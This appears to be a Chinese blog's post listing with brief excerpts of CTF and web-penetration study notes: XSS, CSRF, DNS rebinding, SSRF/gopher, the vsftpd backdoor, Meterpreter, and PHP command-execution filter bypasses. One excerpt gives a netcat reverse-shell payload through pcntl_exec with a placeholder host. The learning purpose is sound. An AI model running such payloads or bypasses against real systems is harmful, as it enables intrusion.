- 博客(34)
- 收藏
- 关注
原创 pikachu反射型XSS(GET)
发现限制输入长度,由于反射型XSS是通过url来进行注入的,所以我们可以通过url来。可以在这里修改maxlength为更大的数,缺点是每次刷新页面之后都要改。在输入框处右键点击检查,自动跳转到关于输入框的html代码处。可以修改message为恶意代码。没有产生目标页面,不知原因。
2024-12-08 14:01:14
176
原创 href和src
href和src的值都是URL,不同之处在于href是建立当前网页与目标资源的链接,而src表示引用目标资源替换当前元素。遇到href会开始下载目标资源,同时不会停止对当前文档的继续执行。但不会进行对目标资源除下载以外的处理如编译。遇到src会先下载目标资源,并且进行处理,如编译。在这些都执行完成之后才会继续进行对当前文档的处理。
2024-12-08 13:59:43
140
原创 JS伪协议
JavaScript 伪协议是一种在 URL 中使用的特殊协议,用于在浏览器中执行 JavaScript 代码。它的形式通常是以 "javascript:" 开头,后跟要执行的 JavaScript 代码。当浏览器遇到这样的 URL 时,会立即执行其中的 JavaScript 代码。
2024-12-08 13:59:13
134
原创 CSRF练习
简单说就是黑客利用受害者的身份来对行使受害者身份才能做的事,比如黑客修改受害者的个人信息。实现方法是让受害者先进行登录,在保持受害者登录状态的情况下诱使其使用同一浏览器打开黑客所给的恶意网页。CSRF能够实施的关键就是黑客能够完全伪装成受害者的信息。根据受害者修改信息的传参方式可以分为get型,post型。前者可以在每一次刷新页面时生成新的token并废除旧的token。可以复制HTML然后创建一个网页,一旦打开就能够实现目的,也可以用浏览器测试,复制url,在和登录页面同一个的浏览器上打开。
2024-12-08 13:58:47
265
原创 等级保护2.0
它基于《中华人民共和国网络安全法》的要求,对信息系统的安全保护等级进行了划分,并规定了相应的安全要求和技术标准。等级保护2.0包括安全通用要求和安全扩展要求。安全通用要求是所有等级保护对象必须实现的基本要求,而安全扩展要求则是根据特定技术或应用场景提出的个性化要求,例如云计算、移动互联、物联网和工业控制系统等。此外,等级保护2.0还提出了对安全管理中心的要求,包括系统管理、审计管理、安全管理和集中管控等方面,以及对安全管理制度的要求,包括安全策略、管理制度、操作规程和记录表单等。
2024-12-08 13:50:07
646
原创 ZoomEye等情报搜集工具
网络空间搜索引擎是一类用于搜索和识别互联网上各种设备和系统的在线工具。它们能够索引全球范围内的服务器、路由器、摄像头、数据库等设备,为网络安全研究、渗透测试、漏洞发现和网络侦查等活动提供数据支持。以下是一些与ZoomEye功能类似的知名网络空间搜索引擎的介绍。
2024-12-08 13:49:27
608
原创 用wireshark分析qq流量并恢复文件
首先要求电脑和手机连在一个WiFi里,然后知道手机的ip。在wireshark处输入过滤条件:ip.src==xxx.xxx.xxx.xxx。另存为jpg图片,再将其拖入010editor,删除jpg图片的文件头FF D8之前的内容,我们也能从删除的东西中看到更多细节内容,找到http数据流,右击追踪TCP数据流。然后再保存图片,打开,就能看到原图。将数据改为KB,显示为原始数据。
2024-12-08 13:48:57
207
原创 TCP和UDP协议
三次握手:当客户端向服务端发起连接时,会发送连接请求数据,即SYN包,如对方同一连接,则回复一包SYN+ACK(Acknowledgement)包,客户端收到之后,发送一包ACK包,由于此过程总共发送了三包数据,因此叫做三次握手。UDP协议是非连接的,直接将数据包封装一下,然后就通过网卡发送,数据包之间并没有状态上的连接。TCP和UDP协议都是用于在传输层的,用于传输数据的协议。因此,TCP协议由于重视完整性和安全性相比UDP协议多了很多控制,速度会更慢。TCP协议更注重传输的完整性,安全性,稳定性。
2024-12-08 13:48:26
183
原创 ftp笑脸漏洞,使用python脚本自动检测
vsfttpd2.3.4在6200端口存在后门,只要用户名中包括:),密码随意,任何人都可连接,且给的权限是root权限。vstftpd,文件传输协议服务,very secure FTP daemon。FTP服务器:File Transfer Protocol,文件传输协议。
2024-12-08 13:47:46
253
原创 Meterperter远控win10
Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户,隐藏一些东西,打开shell,得到用户木马,上传下载远程主机的文件,运行cmd.exe,捕捉屏幕,得到远程控制权扽。查看kali和win10的ip,在keli终端ifconfig查看,ip是192.168.0.103。将文件复制到win10主机,并且关闭其防火墙。
2024-12-08 13:47:15
244
原创 C++内联函数
缺点:由于内联函数是直接复制函数,需要额外的空间供存储复制出来的函数,因此如果函数本身体积过大,则容易导致内存消耗大,代码膨胀的问题。因此,内联函数通常用在小型且调用频繁的函数上。程序通过在不同函数之间来回调用从而执行。而调用函数需要对各种参数和地址进行压栈出栈的操作,如果执行次数很多会对代码执行效率存在一定消耗。内联函数就是为了提高执行效率的。具体原理是:内联函数会让编译器在编译时将此函数复制到调用此函数处,从而不需要进行正常调用函数所做的参数,地址压栈,出栈等,提高执行效率。
2024-10-20 22:46:30
172
原创 C++纯虚函数格式
使用=0来标识一个函数是一个纯虚函数,表示该函数是接口的一部分,派生类必须实现。这只是一个普通的虚函数声明,代表这个虚函数可以被派生类重写,但并没有强制要求。这个类无法实例化,只有派生类提供了此虚函数的实现之后,才能创建该派生类的对象。"=0"表示这是纯虚函数,派生类必须重写这个纯虚函数。
2024-10-20 21:11:49
229
原创 DNS重绑定
首先诱导受害者点击攻击者给的网址,这个网址指向的是攻击者的域名,对应的DNS服务器也是攻击者的。这段代码中首先包含了会在等待TTL时间过去之后再次访问攻击者域名的代码,其次是成功访问受害者内网之后对受害者系统的修改,破坏的恶意代码。当TTL时间过去之后,JS代码会使受害者机器再次访问攻击者域名,而此时域名所对应的IP却是受害者内网的某个IP。最终达到了攻击目的。DNS漏洞就是利用这两次解析之间的时间修改域名对应的IP,从而绕过第一次解析对目标IP的过滤。这个网站生成的域名会将IP随机转化为给的两个IP。
2024-07-28 01:22:01
393
原创 [web渗透]gopher伪协议
然后将上述内容利用burp跟在url后面(不要忘了url本身后面需要一个字符进行占位)发送,在发送的过程中抓包,将这些内容进行两次url编码再发送。用途:通常情况下,我们无法从局域网外的主机向内网的主机直接发送POST请求,但是可以使用gopher伪协议发送。需要注意的点:gopher协议默认的端口为70,因此正常访问是需要加上端口号80。gopher特点:可以用于不同提交方式的数据流提交,比如POST提交。gopher协议:http协议的前身,现如今基本不再使用。而POST则需要四个参数。
2024-07-26 17:28:35
297
原创 SSRF伪协议
学习自从文件系统中获取文件内容,如file:///etc/passwd可用于端口扫描SSH文件传输协议或安全文件传输协议轻量级目录访问协议简单文件传输协议分布式文档传输协议。
2024-07-26 15:01:45
1044
原创 pcntl_exec函数
举例:我们需要执行ls命令,那么payload=pcntl_exec("/bin/bash","nc xxx.xxx.xxx.xxx yyyy -e /bin/bash");:我们执行一个shell命令,比如ls,这个命令肯定是从linux系统的某个文件中获取的,这里的path就是文件的位置。由于函数本身没有回显,所以需要通过shell反弹来查看。使用限制:此函数未被禁用,可通过phpinfo查看。其中xxx.xxx.xxx.xxx是ip地址,:就是我们需要传给程序的参数的字符串数组。
2024-07-24 22:15:56
369
原创 mail函数绕过
所有命令执行函数都被禁了,mail函数可用,putenv文件可用,蚁剑连接成功,可以上传文件。:控制脚本能够执行php文件,要求php文件中执行mail函数。能够对目标服务器传入.so文件。在.so文件中自定义getuid函数。最后将php文件和.so文件都传入目标机器。运行php文件。
2024-07-24 15:50:18
358
原创 LD_PRELOAD绕过php命令执行过滤原理
LD_PRELOAD是一个在Linux/Unix系统中的环境变量,它允许程序在启动前预加载一个或多个共享库(通常是.so文件)到程序的地址空间中。库,顾名思义就是用来存放东西的地方,在程序执行这块,就是用来存储程序将要用到的各种函数。这里主要指动态链接库,详细的内容请百度看看程序编译过程。库里存放了程序执行可能要用到的各种函数。当程序执行时,遇到某个要执行的函数,就会从库中寻找对应的函数。
2024-07-23 03:12:25
1784
原创 [php命令执行函数]详解各种php命令执行函数
return_var:可选参数,整数类型,&表示可以通过引用的方式来在函数执行结束之后修改这个值,如果提供此参数,则command命令执行之后的返回状态会被放置到return_var函数内。return_var:可选参数,整数类型,如果提供此参数,则command命令执行之后的返回状态会被放置到return_var函数内。return_var:可选变量,如果选择,就会将命令是否执行成功的结果填入此变量,成功为0,失败为1。command:必选参数,字符类型,被system函数执行的命令,如ls。
2024-07-18 18:56:03
862
原创 [ctf web]system函数详解[php命令执行函数][web渗透]
return_var:可选参数,整数类型,如果提供此参数,则command命令执行之后的返回状态会被放置到return_var函数内。返回0表示执行成功,返回1表示执行失败。command:必选参数,字符类型,被system函数执行的命令,如ls。system函数简介:用于执行命令。system函数默认有回显。
2024-07-18 16:19:19
446
原创 [md5强比较]一文轻松搞懂md5强比较,绕过方法
再加上此处是强比较,md5有个特点,处理数组时会返回NULL。所以我们可以让a[]=1,b[]=2。总结要求:a和b都存在。以小学期的一题为例,a和b的md5值相等。
2024-07-11 23:21:32
501
原创 if($b>1234)[php]比较大小绕过
对于字符串,比如a='0',字符串在进行比较值的时候会被当作0处理。而且同时a='0'本身会被当作真值处理,这样就满足了if($a==0&&$a),而a=0虽然值为0,但是由于是数值,会被当作假值处理,也就是$a为布尔值0。前面说过,字符串的值会被当作0,这里的1235c就会变成1235来进行大小比较,这样既绕过b不能是数字的限制,又大于1234。所以此处输入a='0'可以绕过。当然也可以是任意字符,比如'。在php中a='0'和a=0是不一样的,前者是字符串,后者是数值。小学期的一道题,特此记录。
2024-07-11 23:08:02
408
原创 【RCE】call_user_func($a,$b)($c);php中call_user_func有三个参数的使用方法;array_pop()解决
遇到call_user_func后面有三个参数,普通的system(ls)无法执行。这时候需要使用array_pop()函数来让数组中最后一个元素出栈,让其变成命令。入下题:b通过get方法,获取所有get方式的结果并且写进一个数组中,接着在call_user_func处又将b作为参数。
2024-07-07 21:27:02
342
原创 PXE-M0F:Exiting Intel PXE ROM Operating System not found
配置虚拟机报错:PXE-M0F:Exiting Intel PXE ROM Operating System not found。
2024-07-07 19:50:46
1474
5
原创 无法连接虚拟设备 ide1:0,因为主机上没有相应的设备。 您要在每次开启此虚拟机时都尝试连接此虚拟设备吗?
虚拟机打开过程中显示:无法连接虚拟设备 ide1:0,因为主机上没有相应的设备。您要在每次开启此虚拟机时都尝试连接此虚拟设备吗?
2024-07-07 19:43:00
1441
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人